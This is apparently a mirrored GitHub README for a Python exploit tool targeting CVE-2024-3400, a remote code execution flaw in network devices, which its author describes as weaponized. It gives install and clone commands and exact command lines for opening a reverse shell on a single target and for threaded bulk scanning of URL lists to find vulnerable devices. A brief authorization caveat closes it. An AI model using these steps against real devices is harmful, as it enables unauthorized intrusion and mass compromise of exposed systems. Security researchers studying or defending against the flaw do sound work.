Giters

Chocapikk / CVE-2024-3400

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2024-3400 Exploit Tool πŸ› οΈ

This Python script is designed to assess and potentially exploit the CVE-2024-3400 vulnerability, which involves a Remote Code Execution (RCE) vulnerability in certain network devices. The script uses directory traversal to potentially execute arbitrary code remotely, or simply identify vulnerable devices.

Why Disclose A Weaponized Exploit?

Despite submissions to bug bounty programs, where this vulnerability was often classified as "informative," I've chosen to disclose this exploit script publicly. The classification as "informative" frequently undermines the potential impact such vulnerabilities can carry.

This disclosure is not just about showcasing a security flaw but emphasizing the need for a redefined approach to how vulnerabilities are perceived and handled by organizations.

Features 🌟

  • Single URL Testing: Targeted testing of a specific device with reverse shell capability.
  • Bulk Scanning: Efficiently scan multiple URLs from a file to identify vulnerable devices without attempting to open a reverse shell.
  • Verbose Output: Provides detailed logs and output customization for deeper insight into the scan results.

Requirements πŸ“‹

  • Python 3.x
  • External libraries: requests, rich, pwncat-cs, alive_progress
  • Network access to the target device(s)

Setup πŸ› 

  1. Install Python Dependencies:

    pip install requests rich pwncat-cs alive_progress

  2. Clone the Repository:

    git clone https://github.com/Chocapikk/CVE-2024-3400
cd CVE-2024-3400

Usage πŸš€

  1. Single Target Exploitation:

    python exploit.py -u <URL> -lh <LocalHost> -lp <LocalPort> -bp <BindPort>
    • URL: Target device URL.
    • LocalHost: Your machine's IP address to listen for reverse shell connections.
    • LocalPort: Port on your machine to listen for incoming connections.
    • BindPort: Optional; use if behind a service like ngrok.

  2. Bulk Scanning Mode:

    python exploit.py -f <filename> -t <threads> -o <outputfile>
    • filename: File containing a list of URLs to test.
    • threads: Number of concurrent threads for scanning.
    • outputfile: File to write vulnerable URLs to.

Output πŸ“„

Results are logged directly to the console and, in bulk scanning mode, to a specified output file. Successful exploitations in single URL mode will provide verbose output indicating the vulnerable status and any additional error messages or connection details.

Caution ⚠️

Use this tool responsibly. Ensure you have proper authorization before testing devices, as unauthorized testing is illegal and unethical.

About

Languages

Language:Python 100.0%